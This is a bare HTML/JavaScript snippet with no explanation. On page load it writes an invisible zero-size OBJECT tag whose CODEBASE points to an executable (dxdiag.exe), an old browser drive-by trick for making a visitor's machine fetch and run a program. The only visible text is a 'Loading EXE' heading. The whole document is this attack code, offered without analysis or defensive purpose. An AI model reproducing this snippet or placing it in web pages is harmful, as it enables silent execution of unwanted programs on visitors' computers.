<script language="JavaScript"> 
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" 
run_exe+="CODEBASE=\"dxdiag.exe#version=1,1,1,1\">" 
run_exe+="<PARAM NAME=\"_Version\" VALUE=\"65536\">" 
run_exe+="</OBJECT>" 
run_exe+="<HTML><H1>Loading EXE文件....</H1></HTML>"; 
document.open(); 
document.clear(); 
document.writeln(run_exe); 
document.close(); 
</script>